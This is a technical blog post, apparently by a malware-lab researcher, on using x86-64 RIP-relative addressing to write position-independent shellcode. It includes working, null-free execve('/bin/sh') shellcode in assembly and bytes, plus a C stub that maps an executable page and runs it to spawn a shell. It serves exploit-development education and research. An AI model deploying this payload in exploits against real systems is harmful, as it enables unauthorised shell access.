Instruction Pointer Relative Addressing (for position independent code)
So, here's an interesting trick I've been using, that I've never seen anyone mention before. One of the new features that AMD added to the x86 instruction set when they did the AMD64/x86-64, was that in "long mode" (64-bit mode), the encoding for the old 32-bit immediate offset addressing mode, is now a 32-bit offset from the current RIP, not from 0x00000000 like before. In English, this means that you don't have to know the absolute address of something you want to reference, you only need to know how far away it is from the currently executing instruction [technically the next instruction].
So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)
This is what we want to do:
execve() example in C
#include <stdio.h>
int main() {
char *name[2];
asm("nop");
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
asm("nop");
return 0;
}
I just put the NOP's in there to make things easier to spot below.
gdb spewage
[spew]gcc -static -g -o example example.c gdb example*(gdb) disassemble main Dump of assembler code for function main: 0x0000000000400284 <main+0>: push %rbp 0x0000000000400285 <main+1>: mov %rsp,%rbp 0x0000000000400288 <main+4>: sub $0x10,%rsp 0x000000000040028c <main+8>: nop 0x000000000040028d <main+9>: movq $0x451ce4,0xfffffffffffffff0(%rbp) 0x0000000000400295 <main+17>: movq $0x0,0xfffffffffffffff8(%rbp) 0x000000000040029d <main+25>: lea 0xfffffffffffffff0(%rbp),%rsi 0x00000000004002a1 <main+29>: mov 0xfffffffffffffff0(%rbp),%rdi 0x00000000004002a5 <main+33>: mov $0x0,%edx 0x00000000004002aa <main+38>: mov $0x0,%eax 0x00000000004002af <main+43>: callq 0x406740 <execve> 0x00000000004002b4 <main+48>: nop 0x00000000004002b5 <main+49>: mov $0x0,%eax 0x00000000004002ba <main+54>: leaveq 0x00000000004002bb <main+55>: retq End of assembler dump. *(gdb) disassemble execve Dump of assembler code for function execve: 0x0000000000406740 <execve+0>: mov $0x0,%eax 0x0000000000406745 <execve+5>: mov %rbx,0xffffffffffffffe8(%rsp) 0x000000000040674a <execve+10>: mov %rbp,0xfffffffffffffff0(%rsp) 0x000000000040674f <execve+15>: mov %r12,0xfffffffffffffff8(%rsp) 0x0000000000406754 <execve+20>: sub $0x18,%rsp 0x0000000000406758 <execve+24>: test %rax,%rax 0x000000000040675b <execve+27>: mov %rdi,%r12 0x000000000040675e <execve+30>: mov %rsi,%rbp 0x0000000000406761 <execve+33>: mov %rdx,%rbx 0x0000000000406764 <execve+36>: je 0x40676b <execve+43> 0x0000000000406766 <execve+38>: callq 0x0 0x000000000040676b <execve+43>: mov %rbx,%rdx 0x000000000040676e <execve+46>: mov %rbp,%rsi 0x0000000000406771 <execve+49>: mov %r12,%rdi 0x0000000000406774 <execve+52>: mov $0x3b,%eax 0x0000000000406779 <execve+57>: syscallYou can ignore the rest of this...0x000000000040677b <execve+59>: cmp $0xfffffffffffff000,%rax 0x0000000000406781 <execve+65>: mov %rax,%rbx 0x0000000000406784 <execve+68>: ja 0x40679b <execve+91> 0x0000000000406786 <execve+70>: mov %ebx,%eax 0x0000000000406788 <execve+72>: mov 0x8(%rsp),%rbp 0x000000000040678d <execve+77>: mov (%rsp),%rbx 0x0000000000406791 <execve+81>: mov 0x10(%rsp),%r12 0x0000000000406796 <execve+86>: add $0x18,%rsp 0x000000000040679a <execve+90>: retq 0x000000000040679b <execve+91>: callq 0x400950 <__errno_location> 0x00000000004067a0 <execve+96>: mov %ebx,%edx 0x00000000004067a2 <execve+98>: mov $0xffffffffffffffff,%rbx 0x00000000004067a9 <execve+105>: neg %edx 0x00000000004067ab <execve+107>: mov %edx,(%rax) 0x00000000004067ad <execve+109>: jmp 0x406786 <execve+70> 0x00000000004067af <execve+111>: nop End of assembler dump. *(gdb) x/s 0x451ce4 0x451ce4 <_IO_stdin_used+4>: "/bin/sh"
For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1, the pointer to "/bin/sh" is in RDI, argument 2, the pointer to the pointer to "/bin/sh", followed by NULL, is in RSI, and argument 3, RDX, is NULL. 0x3B (59.) is the syscall number for execve.
We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.
Excerpt from unistd.h
[...]#define __NR_execve 59 __SYSCALL(__NR_execve, stub_execve)#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ type name(type1 arg1,type2 arg2,type3 arg3) \ { \ long __res; \ __asm__ volatile (__syscall \ : "=a" (__res) \ : "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \ "d" ((long)(arg3)) : __syscall_clobber); \ __syscall_return(type,__res); \ }
So, all we have to do, is have a "/bin/sh" string somewhere in memory, and a pointer to that somewhere else, followed by a NULL; Where ever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP, by making a CALL foo — which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction, and dumping the x87 status registers out into memory with FSTENV — historically, the FPU was a completely separate chip, and would do its own exception handling, and stuff.
In Aleph One's original paper he did this trick:
Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write all the FPU registers out onto the stack, about 12 bytes below the current ESP in fact, which leaves the third DWORD, the EIP, at the top, which can then just be POP'ed off.<rest of shellcode>JMP foo bar: POP ESIfoo: CALL bar .string "/bin/sh"
On x86-64, it is much easier to find you current RIP, just do this:
LEA EAX, [RIP]
And EAX will contain the address of the next instruction.
blah blah blah…
So, I was going to write a long narrative here, about how to write shellcode, and remove nulls, and use shorter instruction encodings and stuff. But I was just distracted, and lost my train of thought. So if there's anything here you don't understand, just ask. By doing [RIP-7] rather than just [RIP], you avoid having a 0x00000000 immediate value. Everything else should be self-explanatory. I'm writing the argv array just past the end of the "/bin/sh" string.
Shellcode
%define arg1 RDI
%define arg2 RSI
%define arg3 RDX
%define arg3_lowb DL
%define sys_nr AL
%define nr_execve 0x3B
BITS 64
LEA arg1, [RIP-here] ; runtime address of *this* LEA instruction,
; removes 00000000's (always encode with 32-bit
; immediate)
; todo: could just push string onto stack (as
; immediate value)
here:
ADD arg1, BYTE bin_sh ; offset of "/bin/sh" in code below
XOR arg3, arg3 ; execve(..., ..., NULL);
MOV [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case
MOV [arg1+null_point], arg3 ; name[1] = NULL;
MOV [arg1+name_array], arg1 ; name[0] = address to "/bin/sh" in
; execve("/bin/sh", ..., ...);
LEA arg2, [arg1+name_array] ; execve(..., name, ...);
MOV sys_nr, nr_execve ; Syscall 59 execve()
SYSCALL ; or INT 0x80
bin_sh:
db "/bin/sh";
null_byte equ $-bin_sh
name_array equ null_byte +1
null_point equ name_array+8
The shellcode binary ends up looking like this:
Shellcode Bytes
488D3DF9FFFFFF LEA RDI, [RIP-here]
4883C721 ADD RDI, BYTE bin_sh
4831D2 XOR RDX, RDX
885707 MOV [RDI+null_byte ], DL
48895710 MOV [RDI+null_point], RDX
48897F08 MOV [RDI+name_array], RDI
488D7708 LEA RSI, [RDI+name_array]
B03B MOV AL, 0x3B
0F05 SYSCALL
2F62696E2F7368 db "/bin/sh"
To quickly test this out, because Gentoo Linux X86_64 will set memory pages to be either writable [X]OR executable, but not both at once, and non-exec actually works on AMD64, I'm just mmaping a page of anonymous memory, writing the shellcode into there, and then running it. This is a lot faster than writing a real exploit. (Which would involve building my own stackframes to make return-to-lib-c calls, to call mprotect and stuff, blah blah.)
memory map
00400000-00471000 r-xp 00000000 fd:05 4853 /home/jwolf/duh
00571000-00573000 rw-p 00071000 fd:05 4853 /home/jwolf/duh
00573000-00596000 rw-p 00573000 00:00 0 [heap]
2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570 /dev/zero (deleted)← this is the mmaped'd page
7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0 [stack]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]
Cut and paste the spew from this, into the shellcode[], below:
yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \ |tr "Q" \\\\ ; echo ; ls -l shellcode
Small code stub in C
#include<sys/mman.h> // TODO: just mmap the binary file the assembler spit out.char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";int length = 40; int main() { void (*exec_mem)() = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, \ MAP_SHARED|MAP_ANONYMOUS, 0, 0); memcpy(exec_mem, shellcode, length); asm("break: nop"); exec_mem(); }
Build with something like:
gcc -g -o stub stub.c
then ./stub
sh-3.00$
or if you were root at the time:
sh-3.00#
ta-da.
Debugging notes
If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:
gdb stub |tee -a gdb_spew.log
and then…
break break
display/i $rip
r
stepi
and then do "info reg" and "x/8xg" stuff as needed.
Postscript:
Has anyone else noticed that when running in 32-bit compatibility mode on AMD64 Linux, that:
- gbd is just plain broken (wrong values in registers, etc.)
- The registers, for the second argument for a syscall, change, randomly, between EBX and EBP when you're using INT 0x80 vs SYSCALL. (CD80 vs. 0F05)
Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com


Recent Comments
Cool trick. Seems like a lot of people still ignore x86-64. Matt Conover also commented on it in 2004, specifically related to OS-independent alphanumeric GetPC code:
http://seclists.org/fulldisclosure/2004/Oct/0105.html
anon on Instruction Pointer Relative Addressing (for position independent code)